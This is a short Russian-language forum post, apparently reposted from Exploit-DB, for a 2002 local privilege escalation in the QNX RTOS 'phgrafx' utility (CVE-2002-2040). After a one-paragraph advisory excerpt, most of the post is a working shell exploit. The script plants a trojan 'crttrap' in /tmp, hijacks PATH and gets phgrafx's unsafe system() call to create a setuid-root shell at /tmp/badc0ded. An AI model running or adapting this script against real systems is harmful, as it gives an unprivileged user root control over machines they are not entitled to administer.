Exploit QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
21503
Проверка EDB
  1. Пройдено
Автор
BADC0DED
Тип уязвимости
LOCAL
Платформа
LINUX
CVE
cve-2002-2040
Дата публикации
2002-06-03
Код:
source: https://www.securityfocus.com/bid/4915/info

The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.

#!/bin/sh
#
# click advanced,done, apply, accept and done. 
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" > /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" >> /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" >> /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " >> /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx
 
Источник
www.exploit-db.com

Похожие темы